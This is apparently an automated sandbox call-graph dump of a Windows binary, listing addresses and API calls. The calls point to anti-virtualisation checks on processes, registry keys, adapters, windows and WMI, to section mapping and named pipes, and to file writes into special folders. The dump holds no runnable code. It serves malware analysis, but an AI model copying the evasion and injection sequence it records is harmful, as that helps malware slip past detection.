7ffa535e22da GetProcessHeap 63484->63485 63487 7ffa535e22d3 __scrt_fastfail 63484->63487 63486 7ffa535e22f7 RtlAllocateHeap 63485->63486 63485->63487 63486->63487 63487->63451 63488->63479 63489->63438 63493 7ffa535e3b00 63490->63493 63494 7ffa535e1073 VirtualProtect 63493->63494 63494->63441 63495 2152060ada0 63496 2152060adc6 GetModuleHandleW 63495->63496 63497 2152060ae10 abort 63495->63497 63496->63497 63501 2152060add3 63496->63501 63498 2152060aebf abort 63497->63498 63509 2152060ae94 63497->63509 63510 2152060ba98 63497->63510 63499 2152060aee8 63498->63499 63500 2152060aef1 63498->63500 63519 2152060af0c 7 API calls 63499->63519 63501->63497 63513 2152060af58 GetModuleHandleExW try_get_function __vcrt_uninitialize_winapi_thunks 63501->63513 63502 2152060aeac 63507 2152060bcec 28 API calls 63502->63507 63507->63498 63509->63502 63514 2152060bcec 63509->63514 63511 2152060b70c 12 API calls 63510->63511 63512 2152060bacd 63511->63512 63512->63509 63513->63497 63515 2152060bd47 63514->63515 63516 2152060bd28 63514->63516 63515->63502 63516->63515 63520 21520585910 63516->63520 63525 2152058607c 63516->63525 63521 215205f51cc __scrt_initialize_thread_safe_statics 13 API calls 63520->63521 63522 21520585923 63521->63522 63523 21520585937 WSAStartup 63522->63523 63524 2152058594b 63522->63524 63523->63524 63524->63516 63528 215205d12f4 63525->63528 63527 2152058608c 63531 215205d10d8 63528->63531 63530 215205d133b __std_exception_destroy 63530->63527 63532 215205d113a _CxxThrowException 63531->63532 63533 215205d1196 63532->63533 63534 215205d11b5 63532->63534 63543 215205d0a5c 25 API calls 3 library calls 63533->63543 63538 215205d09d0 63534->63538 63537 215205d11b0 63537->63530 63544 215205d15b8 63538->63544 63541 215205d0a2b _Ptr_base 63541->63537 63543->63537 63545 215205d15e8 63544->63545 63546 215205d0a08 63545->63546 63553 215205fb034 23 API calls 2 library calls 63545->63553 63546->63541 63549 215205d0950 63546->63549 63550 215205d09a1 __ExceptionPtr::__ExceptionPtr 63549->63550 63551 215205d09be 63550->63551 63554 215205d0af8 63550->63554 63551->63541 63555 215205d0b45 __ExceptionPtr::__ExceptionPtr 63554->63555 63558 215205d0be4 EncodePointer 63555->63558 63564 215205d0c1e __ExceptionPtr::_CallCopyCtor 63555->63564 63566 215205d0c73 63555->63566 63560 215205d0c11 63558->63560 63563 215205d0c0a std::bad_alloc::bad_alloc 63558->63563 63562 215205d15b8 _StaticAlloc 23 API calls 63560->63562 63562->63563 63563->63564 63567 215205f9940 RaiseException _CxxThrowException 63563->63567 63564->63551 63568 215205fb034 23 API calls 2 library calls 63566->63568 63567->63566 63569 7ffa535e30c0 63570 7ffa535e30e6 63569->63570 63571 7ffa535e30fd dllmain_raw 63570->63571 63573 7ffa535e30ee 63570->63573 63575 7ffa535e311d 63570->63575 63572 7ffa535e3110 63571->63572 63571->63573 63582 7ffa535e2ec0 63572->63582 63575->63573 63576 7ffa535e316a 63575->63576 63579 7ffa535e2ec0 62 API calls 63575->63579 63576->63573 63577 7ffa535e2ec0 62 API calls 63576->63577 63578 7ffa535e3180 63577->63578 63578->63573 63580 7ffa535e318a dllmain_raw 63578->63580 63581 7ffa535e315d dllmain_raw 63579->63581 63580->63573 63581->63576 63583 7ffa535e2ec8 63582->63583 63588 7ffa535e2f01 __scrt_acquire_startup_lock 63582->63588 63584 7ffa535e2ef5 63583->63584 63585 7ffa535e2ecd 63583->63585 63614 7ffa535e33bc 63584->63614 63586 7ffa535e2ee8 __scrt_dllmain_crt_thread_attach 63585->63586 63587 7ffa535e2ed2 63585->63587 63591 7ffa535e2ee6 63586->63591 63590 7ffa535e2ed7 63587->63590 63629 7ffa535e32fc 22 API calls 63587->63629 63593 7ffa535e3085 63588->63593 63605 7ffa535e305a 63588->63605 63631 7ffa535e372c 6 API calls __scrt_fastfail 63588->63631 63590->63575 63591->63575 63632 7ffa535e3378 15 API calls __scrt_initialize_onexit_tables 63593->63632 63596 7ffa535e308a 63633 7ffa535e33a8 12 API calls __vcrt_uninitialize_ptd 63596->63633 63597 7ffa535e2f32 __scrt_acquire_startup_lock 63599 7ffa535e2f5e 63597->63599 63611 7ffa535e2f36 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 63597->63611 63630 7ffa535e372c 6 API calls __scrt_fastfail 63597->63630 63622 7ffa535e32bc 63599->63622 63600 7ffa535e3095 __scrt_release_startup_lock 63634 7ffa535e3594 8 API calls 2 library calls 63600->63634 63603 7ffa535e2f6d _RTC_Initialize 63603->63611 63625 7ffa535e3610 63603->63625 63605->63575 63609 7ffa535e2f87 63610 7ffa535e3610 35 API calls 63609->63610 63612 7ffa535e2f93 __scrt_initialize_default_local_stdio_options 63610->63612 63611->63575 63612->63611 63613 7ffa535e2faf __scrt_dllmain_after_initialize_c 63612->63613 63613->63611 63615 7ffa535e33de __isa_available_init 63614->63615 63635 7ffa535e42ec 63615->63635 63620 7ffa535e33e7 63620->63597 63684 7ffa535e3408 63622->63684 63624 7ffa535e32c7 63624->63603 63690 7ffa535e35c0 63625->63690 63627 7ffa535e2f82 63628 7ffa535e36d4 InitializeSListHead 63627->63628 63629->63591 63630->63599 63631->63593 63632->63596 63633->63600 63634->63605 63636 7ffa535e42f5 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 63635->63636 63648 7ffa535e45b4 63636->63648 63640 7ffa535e430c 63642 7ffa535e33e3 63640->63642 63655 7ffa535e45fc DeleteCriticalSection 63640->63655 63642->63620 63643 7ffa535e7dd4 63642->63643 63644 7ffa535ef3fc 63643->63644 63645 7ffa535e33f0 63644->63645 63672 7ffa535e8588 63644->63672 63645->63620 63647 7ffa535e4348 8 API calls 3 library calls 63645->63647 63647->63620 63649 7ffa535e45bc 63648->63649 63651 7ffa535e45ed 63649->63651 63652 7ffa535e42ff 63649->63652 63656 7ffa535e4960 63649->63656 63661 7ffa535e45fc DeleteCriticalSection 63651->63661 63652->63642 63654 7ffa535e4550 8 API calls 3 library calls 63652->63654 63654->63640 63655->63642 63662 7ffa535e4634 63656->63662 63659 7ffa535e49b7 InitializeCriticalSectionAndSpinCount 63660 7ffa535e49a3 63659->63660 63660->63649 63661->63652 63663 7ffa535e469a 63662->63663 63668 7ffa535e4695 63662->63668 63663->63659 63663->63660 63664 7ffa535e4762 63664->63663 63666 7ffa535e4771 GetProcAddress 63664->63666 63665 7ffa535e46cd LoadLibraryExW 63667 7ffa535e46f3 GetLastError 63665->63667 63665->63668 63666->63663 63669 7ffa535e4789 63666->63669 63667->63668 63670 7ffa535e46fe LoadLibraryExW 63667->63670 63668->63663 63668->63664 63668->63665 63671 7ffa535e4740 FreeLibrary 63668->63671 63669->63663 63670->63668 63671->63668 63683 7ffa535ed6a8 EnterCriticalSection 63672->63683 63674 7ffa535e8598 63675 7ffa535efe8c 33 API calls 63674->63675 63676 7ffa535e85a1 63675->63676 63677 7ffa535e85af 63676->63677 63678 7ffa535e83a0 35 API calls 63676->63678 63679 7ffa535ed6fc _isindst LeaveCriticalSection 63677->63679 63680 7ffa535e85aa 63678->63680 63681 7ffa535e85bb 63679->63681 63682 7ffa535e848c GetStdHandle GetFileType 63680->63682 63681->63644 63682->63677 63685 7ffa535e34c6 63684->63685 63688 7ffa535e3420 __scrt_initialize_onexit_tables 63684->63688 63689 7ffa535e372c 6 API calls __scrt_fastfail 63685->63689 63687 7ffa535e34d0 63688->63624 63689->63687 63691 7ffa535e35ef 63690->63691 63693 7ffa535e35e5 _onexit 63690->63693 63694 7ffa535e7c54 35 API calls _onexit 63691->63694 63693->63627 63694->63693 63695 7ffa535fb25c 63696 7ffa535fb2b3 GetCurrentThreadId 63695->63696 63697 7ffa535fb2c3 63695->63697 63696->63697 63698 7ffa535e1000 2 API calls 63697->63698 63699 7ffa535fb32f NtOpenFile 63698->63699 63700 7ffa535fb365 63699->63700 63701 7ffa535fb359 63699->63701 63702 7ffa535e1000 2 API calls 63700->63702 63702->63701 63703 215205f4e44 63704 215205f4e4d __scrt_initialize_onexit_tables 63703->63704 63706 215205f4e51 63704->63706 63707 2152060b210 63704->63707 63708 2152060b22e 63707->63708 63709 2152060b244 63707->63709 63735 21520603944 11 API calls _Wcrtomb 63708->63735 63737 21520610b00 63709->63737 63712 2152060b233 63736 215205faabc 11 API calls _invalid_parameter_noinfo 63712->63736 63715 2152060b276 63741 2152060aff0 23 API calls _Getcvt 63715->63741 63716 2152060b23f 63716->63706 63718 2152060b2a0 63742 2152060b1ac 11 API calls 2 library calls 63718->63742 63720 2152060b2b6 63721 2152060b2be 63720->63721 63722 2152060b2cf 63720->63722 63743 21520603944 11 API calls _Wcrtomb 63721->63743 63744 2152060aff0 23 API calls _Getcvt 63722->63744 63726 2152060b2eb 63727 2152060b31b 63726->63727 63728 2152060b334 63726->63728 63732 2152060b2c3 63726->63732 63745 2152060a780 11 API calls 2 library calls 63727->63745 63747 2152060a780 11 API calls 2 library calls 63728->63747 63731 2152060b324 63746 2152060a780 11 API calls 2 library calls 63731->63746 63748 2152060a780 11 API calls 2 library calls 63732->63748 63734 2152060b330 63734->63716 63735->63712 63736->63716 63738 21520610b0d 63737->63738 63739 2152060b249 GetModuleFileNameA 63737->63739 63749 21520610948 36 API calls 4 library calls 63738->63749 63739->63715 63741->63718 63742->63720 63743->63732 63744->63726 63745->63731 63746->63734 63747->63732 63748->63716 63749->63739 63750 7ffa535e1cf8 63751 7ffa535e1000 2 API calls 63750->63751 63752 7ffa535e1d6f 63751->63752 63753 7ffa535e1d87 GetCurrentThreadId 63752->63753 63754 7ffa535e2162 63752->63754 63753->63754 63755 7ffa535e1d9e 63753->63755 63757 7ffa535e1000 2 API calls 63754->63757 63767 7ffa535f5694 63755->63767 63759 7ffa535e214d 63757->63759 63758 7ffa535e1e53 63758->63759 63760 7ffa535e1fcf 63758->63760 63761 7ffa535e1e7e 63758->63761 63760->63759 63775 7ffa535f615c 63760->63775 63761->63759 63762 7ffa535e1ef9 63761->63762 63774 7ffa535f59e8 5 API calls __scrt_fastfail 63762->63774 63764 7ffa535e1fb9 63764->63759 63768 7ffa535f5727 63767->63768 63769 7ffa535f58d1 63767->63769 63771 7ffa535f615c 4 API calls 63768->63771 63770 7ffa535f615c 4 API calls 63769->63770 63773 7ffa535f583a 63770->63773 63772 7ffa535f578a NtMapViewOfSection 63771->63772 63772->63773 63773->63758 63774->63764 63776 7ffa535f6220 63775->63776 63782 7ffa535e206b WaitNamedPipeA 63775->63782 63777 7ffa535f6323 63776->63777 63778 7ffa535f622f NtCreateSection 63776->63778 63779 7ffa535f6347 DisconnectNamedPipe 63777->63779 63780 7ffa535f637b 63777->63780 63777->63782 63778->63782 63779->63780 63781 7ffa535f639e 63780->63781 63780->63782 63785 7ffa535f9404 FindFirstFileA CreateNamedPipeA 63781->63785 63782->63759 63782->63760 63784 7ffa535f64c0 63784->63782 63785->63784 63786 2152060b388 63787 2152060b3a5 63786->63787 63788 2152060b39c 63786->63788 63788->63787 63792 2152060b3d0 63788->63792 63793 2152060b3ae 63792->63793 63794 2152060b3e9 63792->63794 63793->63787 63804 2152060b57c 13 API calls 2 library calls 63793->63804 63795 21520610b00 36 API calls 63794->63795 63796 2152060b3ee 63795->63796 63805 21520614924 GetEnvironmentStringsW 63796->63805 63799 2152060b3fb 63819 2152060a780 11 API calls 2 library calls 63799->63819 63801 2152060b408 63818 2152060a780 11 API calls 2 library calls 63801->63818 63804->63787 63806 215206149f6 63805->63806 63807 21520614952 WideCharToMultiByte 63805->63807 63810 2152060b3f3 63806->63810 63811 21520614a00 FreeEnvironmentStringsW 63806->63811 63807->63806 63809 215206149ac 63807->63809 63820 21520603d7c 63809->63820 63810->63799 63817 2152060b43c 11 API calls 3 library calls 63810->63817 63811->63810 63814 215206149bc WideCharToMultiByte 63815 215206149e3 63814->63815 63826 2152060a780 11 API calls 2 library calls 63815->63826 63817->63801 63818->63799 63819->63793 63821 21520603dc7 63820->63821 63822 21520603d8b __crtLCMapStringA new 63820->63822 63827 21520603944 11 API calls _Wcrtomb 63821->63827 63822->63821 63824 21520603dae HeapAlloc 63822->63824 63824->63822 63825 21520603dc5 63824->63825 63825->63814 63825->63815 63826->63806 63827->63825 63828 21520589e00 63829 21520589e6d 63828->63829 63830 21520589e64 WaitForSingleObject 63828->63830 63831 21520589e91 63829->63831 63984 21520586c40 63829->63984 63830->63829 64000 215205ccd00 63831->64000 63834 21520589e96 63835 21520589e9e 63834->63835 63836 2152058c0ab collate 63834->63836 64079 215205fae64 11 API calls 63835->64079 63838 21520589ea5 64080 215205fab80 23 API calls _Getcvt 63838->64080 63840 21520589ead 64081 215205face4 15 API calls 4 library calls 63840->64081 63842 21520589ed1 64082 21520586b10 12 API calls 3 library calls 63842->64082 63845 2152058a0b9 64084 21520586b10 12 API calls 3 library calls 63845->64084 63847 2152058a0fc 64085 21520586b10 12 API calls 3 library calls 63847->64085 63849 2152058a146 64086 215205871e0 70 API calls 2 library calls 63849->64086 63851 21520589f24 64083 21520586b10 12 API calls 3 library calls 63851->64083 63852 2152058a34c CoInitializeEx CoInitializeSecurity 64087 215205ca49c GetModuleHandleW try_get_function 63852->64087 63854 2152058a3b2 64088 215205cbe80 31 API calls _Mpunct 63854->64088 63856 2152058a3be 64089 215205cbb80 31 API calls _Mpunct 63856->64089 63858 2152058a3c8 64090 215205895d0 12 API calls collate 63858->64090 63860 2152058a3df 64091 21520581460 35 API calls 2 library calls 63860->64091 63862 2152058a4de 64092 215205c7480 22 API calls std::_Winerror_message 63862->64092 63864 2152058a4eb 63865 2152058a4ef CoUninitialize TerminateThread 63864->63865 63866 2152058a509 63864->63866 63983 2152058bfdf collate 63865->63983 64093 2152058c4c0 12 API calls messages 63866->64093 63867 2152058a15c 63867->63852 63869 2152058a529 64094 2152058c4c0 12 API calls messages 63869->64094 63871 2152058a54b 64095 215205cc000 31 API calls _Mpunct 63871->64095 63873 2152058a558 63874 2152058a5af collate 63873->63874 64096 21520588c10 12 API calls 3 library calls 63873->64096 64099 215205cbd00 31 API calls _Mpunct 63874->64099 63877 2152058a5c8 63880 2152058a61a collate 63877->63880 64100 21520588c10 12 API calls 3 library calls 63877->64100 63878 2152058a57e 64097 215205893d0 12 API calls 63878->64097 63883 21520586c40 messages 12 API calls 63880->63883 63981 2152058a668 collate _Strcoll __ExceptionPtr::__ExceptionPtr numpunct 63883->63981 63884 2152058a598 64098 21520588d60 12 API calls 3 library calls 63884->64098 63885 2152058a5e9 64101 215205893d0 12 API calls 63885->64101 63888 2152058c061 collate 63888->63836 63889 2152058a603 64102 21520588d60 12 API calls 3 library calls 63889->64102 63893 2152058b906 Sleep 63893->63981 63897 2152058a7a0 Sleep 63897->63981 63901 2152058a998 Sleep 63901->63981 63903 2152058b7f5 Sleep 63903->63981 63905 2152058b0f5 Sleep 63905->63981 63908 2152058b289 SHGetSpecialFolderPathA lstrcatA 64113 215205c7750 53 API calls 63908->64113 63911 2152058b43f SHGetSpecialFolderPathA lstrcatA 64118 215205ca9c8 CreateFileA WriteFile CloseHandle 63911->64118 63914 2152058b36a SHGetSpecialFolderPathA lstrcatA 64116 215205c7750 53 API calls 63914->64116 63915 2152058b932 64128 2152058c310 12 API calls 63915->64128 63916 21520586b10 12 API calls _Mpunct 63916->63981 63919 2152058b9f1 64129 215205c3d60 12 API calls 4 library calls 63919->64129 63923 2152058ba1e 64130 2152059a7f0 98 API calls 6 library calls 63923->64130 63924 2152058bb86 63925 2152058bb91 63924->63925 63926 2152058bbb9 63924->63926 64137 21520587ed0 109 API calls 5 library calls 63925->64137 63928 21520586c40 messages 12 API calls 63926->63928 63932 2152058bbb7 63928->63932 63930 2152058c510 12 API calls 63930->63981 63931 2152058d0c0 12 API calls 63931->63981 64138 21520586b10 12 API calls 3 library calls 63932->64138 63933 2152058ba56 collate 64131 21520587760 12 API calls messages 63933->64131 63935 2152058bc01 GetCurrentProcessId 64139 21520589d20 12 API calls 63935->64139 63939 2152058ba75 64132 215205868f0 12 API calls _Mpunct 63939->64132 63940 2152058bc16 64140 2152058ca20 12 API calls collate 63940->64140 63943 2152058ba89 GetCurrentProcessId 64133 21520589d20 12 API calls 63943->64133 63944 2152058bc23 64141 21520588d60 12 API calls 3 library calls 63944->64141 63948 2152058ba9e 64134 2152058ca20 12 API calls collate 63948->64134 63951 2152058bd28 64143 21520588d60 12 API calls 3 library calls 63951->64143 63954 2152058bc37 64142 21520588c10 12 API calls 3 library calls 63954->64142 63955 2152058bd3f 64144 21520588c10 12 API calls 3 library calls 63955->64144 63957 2152058bd55 64145 21520588c10 12 API calls 3 library calls 63957->64145 63959 2152058bd7e 64146 2152058c310 12 API calls 63959->64146 63961 2152058bdaa 64147 215205c3d60 12 API calls 4 library calls 63961->64147 63963 2152058bdd4 64148 2152059a7f0 98 API calls 6 library calls 63963->64148 63965 2152058baae collate 64135 215205cb510 45 API calls 6 library calls 63965->64135 63966 215205868f0 12 API calls 63966->63981 63970 2152058bb38 CoUninitialize TerminateThread 63973 2152058bb5a collate 63970->63973 63971 2152058be71 CoUninitialize TerminateThread 63976 2152058be91 63971->63976 63972 2152058be05 64149 215205cb510 45 API calls 6 library calls 63972->64149 64136 2152058c3d0 RaiseException 63973->64136 63978 2152058bb81 collate 63976->63978 64150 2152058c690 RaiseException Concurrency::cancel_current_task new 63976->64150 64151 2152058c3d0 RaiseException 63978->64151 63981->63888 63981->63911 63981->63915 63981->63916 63981->63924 63981->63930 63981->63931 63981->63966 63982 21520586730 12 API calls 63981->63982 64103 2152059a380 98 API calls 3 library calls 63981->64103 64104 215205c3d60 12 API calls 4 library calls 63981->64104 64105 2152059a7f0 98 API calls 6 library calls 63981->64105 64106 215205fab54 23 API calls _Getcvt 63981->64106 64107 215205f4dcc RaiseException Concurrency::cancel_current_task new 63981->64107 64108 2152058cf30 RaiseException __CxxCallCatchBlock numpunct 63981->64108 64109 215205fab54 23 API calls _Getcvt 63981->64109 64110 215205fab54 23 API calls _Getcvt 63981->64110 64111 21520586430 28 API calls 63981->64111 64112 215205fab54 23 API calls _Getcvt 63981->64112 64114 21520587ae0 10 API calls 2 library calls 63981->64114 64115 215205fab54 23 API calls _Getcvt 63981->64115 64117 21520587cb0 25 API calls 2 library calls 63981->64117 64119 215205cb510 45 API calls 6 library calls 63981->64119 64120 21520587ed0 109 API calls 5 library calls 63981->64120 64121 215205c80c0 12 API calls 63981->64121 64122 215205c802c 70 API calls 63981->64122 64123 215205ba9e0 160 API calls 3 library calls 63981->64123 64124 215205893d0 12 API calls 63981->64124 64125 21520586200 12 API calls 63981->64125 64126 215205fab54 23 API calls _Getcvt 63981->64126 64127 215205fab54 23 API calls _Getcvt 63981->64127 63982->63981 64152 215205876d0 RaiseException collate 63983->64152 63985 21520586c6e 63984->63985 63986 21520586d47 63984->63986 63988 21520586c7d 63985->63988 63989 21520586cac 63985->63989 64155 215205d0924 12 API calls 2 library calls 63986->64155 63992 21520586d53 63988->63992 63993 21520586c8b 63988->63993 63990 21520586d60 63989->63990 63991 21520586cb6 63989->63991 64157 215205d0900 12 API calls 2 library calls 63990->64157 63999 21520586ca7 memcpy_s 63991->63999 64154 21520587030 RaiseException Concurrency::cancel_current_task memcpy_s new 63991->64154 64156 215205d0924 12 API calls 2 library calls 63992->64156 64153 21520586f60 12 API calls 2 library calls 63993->64153 63999->63831 64158 215205d0220 GetProcessHeap HeapAlloc 64000->64158 64002 215205ccd10 64003 215205ccd14 64002->64003 64165 215205d0330 CreateToolhelp32Snapshot 64002->64165 64003->63834 64006 215205ccd3e 64006->63834 64009 215205ccd7b GetModuleHandleW 64011 215205ccd92 try_get_function 64009->64011 64010 215205ccd65 64010->63834 64183 215205cf230 64011->64183 64013 215205ccdb3 64078 215205ccfe7 64013->64078 64193 215205cd230 64013->64193 64021 215205ccdf7 64022 215205d0220 10 API calls 64021->64022 64021->64078 64023 215205cce13 64022->64023 64239 215205cd870 64023->64239 64026 215205cce51 64247 215205cd990 64026->64247 64028 215205cce62 64256 215205cda30 64028->64256 64032 215205cce83 64278 215205cdcc0 64032->64278 64036 215205cce9f 64305 215205ce070 64036->64305 64038 215205ccead 64309 215205ce5c0 64038->64309 64040 215205ccebb 64324 215205ce7d0 64040->64324 64042 215205ccec9 64340 215205ce1c0 64042->64340 64044 215205cced7 64355 215205ce3a0 64044->64355 64046 215205ccee5 64370 215205cea60 64046->64370 64048 215205ccef3 64048->64078 64387 215205cfec0 64048->64387 64058 215205ccf46 64423 215205cf080 64058->64423 64060 215205ccf54 64060->64078 64426 215205cf2f0 64060->64426 64066 215205ccf85 64066->64078 64465 215205cfe10 64066->64465 64069 215205d0220 10 API calls 64070 215205ccfab 64069->64070 64070->64078 64472 215205cfa60 64070->64472 64078->63834 64079->63838 64080->63840 64081->63842 64082->63851 64083->63845 64084->63847 64085->63849 64086->63867 64087->63854 64088->63856 64089->63858 64090->63860 64091->63862 64092->63864 64093->63869 64094->63871 64095->63873 64096->63878 64097->63884 64098->63874 64099->63877 64100->63885 64101->63889 64102->63880 64103->63981 64104->63981 64105->63981 64106->63897 64107->63981 64108->63981 64109->63901 64110->63905 64111->63981 64112->63908 64113->63981 64114->63981 64115->63914 64116->63981 64117->63981 64118->63981 64119->63981 64120->63981 64121->63981 64122->63981 64123->63981 64124->63981 64125->63981 64126->63903 64127->63893 64128->63919 64129->63923 64130->63933 64131->63939 64132->63943 64133->63948 64134->63965 64135->63970 64136->63978 64137->63932 64138->63935 64139->63940 64140->63944 64141->63954 64142->63951 64143->63955 64144->63957 64145->63959 64146->63961 64147->63963 64148->63972 64149->63971 64150->63978 64151->63983 64152->63888 64153->63999 64154->63999 64155->63992 64156->63990 64159 215205d026d GetAdaptersInfo 64158->64159 64160 215205d025b 64158->64160 64161 215205d0280 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 64159->64161 64164 215205d02c2 GetProcessHeap HeapFree 64159->64164 64160->64002 64161->64160 64162 215205d02b4 GetAdaptersInfo 64161->64162 64162->64164 64164->64002 64166 215205d0374 Process32FirstW 64165->64166 64169 215205d03ed 64165->64169 64167 215205d03e4 CloseHandle 64166->64167 64168 215205d038e StrCmpIW 64166->64168 64167->64169 64170 215205d03a3 CloseHandle 64168->64170 64171 215205d03af Process32NextW 64168->64171 64172 215205f59d0 _handle_error 4 API calls 64169->64172 64170->64169 64171->64167 64173 215205d03be 64171->64173 64174 215205ccd31 64172->64174 64175 215205d03c0 StrCmpIW 64173->64175 64174->64006 64177 215205cd010 64174->64177 64175->64170 64176 215205d03d5 Process32NextW 64175->64176 64176->64167 64176->64175 64178 215205cd190 64177->64178 64179 215205d0330 12 API calls 64178->64179 64180 215205cd1a7 64178->64180 64179->64178 64181 215205f59d0 _handle_error 4 API calls 64180->64181 64182 215205ccd59 64181->64182 64182->64009 64182->64010 64184 215205cf25b __ExceptionPtr::__ExceptionPtr 64183->64184 64503 215205cd1d0 64184->64503 64187 215205cf2d4 64190 215205f59d0 _handle_error 4 API calls 64187->64190 64188 215205cf2ac RegCloseKey 64189 215205f59d0 _handle_error 4 API calls 64188->64189 64191 215205cf2cc 64189->64191 64192 215205cf2e6 64190->64192 64191->64013 64192->64013 64194 215205cd2f0 __ExceptionPtr::__ExceptionPtr 64193->64194 64195 215205cd1d0 35 API calls 64194->64195 64197 215205cd34a 64194->64197 64522 215205d0130 64194->64522 64195->64194 64198 215205f59d0 _handle_error 4 API calls 64197->64198 64199 215205ccdcd 64198->64199 64200 215205cd380 64199->64200 64201 215205cd420 __ExceptionPtr::__ExceptionPtr 64200->64201 64202 215205cd1d0 35 API calls 64201->64202 64205 215205cd48b 64201->64205 64203 215205cd456 RegOpenKeyExW 64202->64203 64203->64201 64204 215205cd48f RegCloseKey 64203->64204 64204->64205 64206 215205f59d0 _handle_error 4 API calls 64205->64206 64207 215205ccddb 64206->64207 64208 215205cd4d0 64207->64208 64209 215205cd5d9 __ExceptionPtr::__ExceptionPtr 64208->64209 64210 215205cd5ea GetWindowsDirectoryW 64209->64210 64534 215205d00a0 64210->64534 64212 215205cd608 64213 215205cd60c Wow64DisableWow64FsRedirection 64212->64213 64215 215205cd617 __ExceptionPtr::__ExceptionPtr 64212->64215 64213->64215 64214 215205cd620 PathCombineW 64214->64215 64215->64214 64216 215205cd1d0 35 API calls 64215->64216 64222 215205cd682 64215->64222 64217 215205cd666 GetFileAttributesW 64216->64217 64217->64215 64218 215205cd6b0 64219 215205f59d0 _handle_error 4 API calls 64218->64219 64220 215205ccde9 64219->64220 64225 215205cd740 64220->64225 64221 215205cd6ef GetCurrentProcess 64223 215205cd6ff 64221->64223 64222->64218 64222->64221 64223->64218 64224 215205cd706 Wow64RevertWow64FsRedirection 64223->64224 64224->64218 64226 215205cd76e __ExceptionPtr::__ExceptionPtr 64225->64226 64227 215205d00a0 GetCurrentProcess 64226->64227 64228 215205cd7cb 64227->64228 64229 215205cd7ec SHGetSpecialFolderPathW 64228->64229 64230 215205cd7d7 ExpandEnvironmentStringsW 64228->64230 64231 215205cd7fb PathCombineW GetFileAttributesW 64229->64231 64230->64231 64232 215205cd84a 64231->64232 64233 215205cd829 64231->64233 64234 215205f59d0 _handle_error 4 API calls 64232->64234 64233->64232 64235 215205cd82d 64233->64235 64236 215205cd85c 64234->64236 64237 215205f59d0 _handle_error 4 API calls 64235->64237 64236->64021 64238 215205cd842 64237->64238 64238->64021 64240 215205cd8e0 CreateFileW 64239->64240 64242 215205cd924 __ExceptionPtr::__ExceptionPtr 64240->64242 64241 215205cd1d0 35 API calls 64241->64242 64242->64240 64242->64241 64243 215205cd950 CloseHandle 64242->64243 64244 215205cd94c 64242->64244 64243->64244 64245 215205f59d0 _handle_error 4 API calls 64244->64245 64246 215205cce22 FindWindowW FindWindowW 64245->64246 64246->64026 64248 215205f8ef0 __ExceptionPtr::__ExceptionPtr 64247->64248 64249 215205cd9bb WNetGetProviderNameW 64248->64249 64250 215205cda0f 64249->64250 64251 215205cd9dc StrCmpIW 64249->64251 64253 215205f59d0 _handle_error 4 API calls 64250->64253 64252 215205f59d0 _handle_error 4 API calls 64251->64252 64254 215205cda07 64252->64254 64255 215205cda21 64253->64255 64254->64028 64255->64028 64258 215205cda70 __ExceptionPtr::__ExceptionPtr 64256->64258 64257 215205cd1d0 35 API calls 64257->64258 64258->64257 64259 215205d0330 12 API calls 64258->64259 64260 215205cdab5 64258->64260 64259->64258 64261 215205f59d0 _handle_error 4 API calls 64260->64261 64262 215205cce75 64261->64262 64263 215205cdae0 64262->64263 64539 215205d0410 CoInitializeEx 64263->64539 64265 215205cdb0b 64266 215205cdb13 SysAllocString SysAllocString 64265->64266 64267 215205cdcb5 64265->64267 64268 215205cdbaa 64266->64268 64273 215205cdb55 64266->64273 64267->64032 64269 215205cdbb4 SysFreeString 64268->64269 64276 215205cdbbd wcsstr 64268->64276 64269->64276 64270 215205cdba1 SysFreeString 64270->64268 64271 215205cdca5 64271->64032 64272 215205cdc7f CoUninitialize 64272->64271 64273->64270 64274 215205cdb9b CoUninitialize 64273->64274 64274->64270 64276->64271 64276->64272 64277 215205cdc5a VariantClear 64276->64277 64277->64276 64279 215205d0410 9 API calls 64278->64279 64280 215205cdd20 64279->64280 64281 215205cdf97 64280->64281 64282 215205cdd28 SysAllocString SysAllocString 64280->64282 64286 215205f59d0 _handle_error 4 API calls 64281->64286 64283 215205cddc0 64282->64283 64288 215205cdd6a 64282->64288 64284 215205cddc5 SysFreeString 64283->64284 64292 215205cddce 64283->64292 64284->64292 64285 215205cddb7 SysFreeString 64285->64283 64287 215205cce91 64286->64287 64302 215205cdfd0 64287->64302 64288->64285 64290 215205cddb1 CoUninitialize 64288->64290 64289 215205cdf69 CoUninitialize 64289->64281 64290->64285 64292->64281 64292->64289 64293 215205cde60 StrCmpIW 64292->64293 64294 215205cdf48 VariantClear 64292->64294 64293->64294 64295 215205cde79 VariantClear 64293->64295 64294->64292 64296 215205cdea5 SafeArrayAccessData 64295->64296 64296->64294 64297 215205cdebe SafeArrayGetLBound SafeArrayGetUBound 64296->64297 64298 215205cdef0 SafeArrayGetElement 64297->64298 64299 215205cdf3f SafeArrayUnaccessData 64297->64299 64301 215205cdf10 64298->64301 64299->64294 64301->64298 64301->64299 64552 215206019f0 25 API calls 4 library calls 64301->64552 64553 215205d0670 64302->64553 64304 215205cdff1 64304->64036 64308 215205ce08a 64305->64308 64306 215205ce092 64306->64038 64307 215205d0670 58 API calls 64307->64308 64308->64306 64308->64307 64310 215205d0410 9 API calls 64309->64310 64311 215205ce5e5 64310->64311 64312 215205ce7c3 64311->64312 64313 215205ce5ed SysAllocString SysAllocString 64311->64313 64312->64040 64314 215205ce684 64313->64314 64319 215205ce62f 64313->64319 64315 215205ce689 SysFreeString 64314->64315 64323 215205ce692 wcsstr 64314->64323 64315->64323 64316 215205ce67b SysFreeString 64316->64314 64317 215205ce7ab 64317->64040 64318 215205ce77a CoUninitialize 64318->64317 64319->64316 64320 215205ce675 CoUninitialize 64319->64320 64320->64316 64322 215205ce759 VariantClear 64322->64323 64323->64317 64323->64318 64323->64322 64325 215205d0410 9 API calls 64324->64325 64326 215205ce800 64325->64326 64327 215205ce808 SysAllocString SysAllocString 64326->64327 64328 215205cea47 64326->64328 64329 215205ce8a5 64327->64329 64333 215205ce850 64327->64333 64328->64042 64331 215205ce8b2 SysFreeString 64329->64331 64334 215205ce8bb wcsstr 64329->64334 64330 215205ce89c SysFreeString 64330->64329 64331->64334 64332 215205cea34 64332->64042 64333->64330 64336 215205ce896 CoUninitialize 64333->64336 64334->64332 64335 215205cea0e CoUninitialize 64334->64335 64338 215205ce96d VariantClear 64334->64338 64339 215205ce9e9 VariantClear 64334->64339 64335->64332 64336->64330 64338->64334 64339->64334 64341 215205d0410 9 API calls 64340->64341 64342 